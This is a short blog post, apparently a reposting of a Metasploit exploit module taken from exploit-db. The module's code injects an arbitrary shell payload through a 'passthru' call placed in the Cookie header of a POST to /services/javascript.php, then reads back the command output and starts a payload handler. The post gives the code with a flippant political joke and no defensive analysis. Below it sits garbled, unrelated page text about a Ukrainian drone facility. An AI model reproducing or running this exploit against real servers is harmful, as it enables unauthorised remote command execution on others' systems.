BLACK MASK: here's Hillary's favourite code :) "This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions."

Friday, April 6, 2018

here's Hillary's favourite code :) "This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions."

def exploit

        # Make sure the URI begins with a slash

        uri = datastore['URI']

        if uri[0,1] != '/'

            uri = '/' + uri

        end

        # Make sure the URI ends without a slash, because it's already part of the URI

        if uri[-1, 1] == '/'

            uri = uri[0, uri.length-1]

        end

        function = "passthru"

        key = Rex::Text.rand_text_alpha(6)

        arguments = "echo #{key}`"+payload.raw+"`#{key}"

        res = send_request_cgi({

            'uri'     => uri + "/services/javascript.php",

            'method'  => 'POST',

            'ctype'   => 'application/x-www-form-urlencoded',

            'data'    => "app="+datastore['APP']+"&file=open_calendar.js",

            'headers' =>

            {

                'Cookie' => "href="+function+":"+arguments,

                'Connection' => 'Close',

            }

        }) #default timeout, we don't care about the response

        if (res)

            print_status("The server returned: #{res.code} #{res.message}")

        end

        resp = res.body.split(key)

        if resp and resp[1]

            print_status(resp[1])

        else

            print_error("No response found")

        end

        handler

    end

end

https://www.exploit-db.com/exploits/18492/

BLACK MASK

Friday, April 6, 2018

here's Hillary's favourite code :) "This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions."

No comments:

Ukraine, UAV drone facility centerlication inside Ukraine Quantum system

Total Pageviews

Search Webcams:
by www.online-camera.de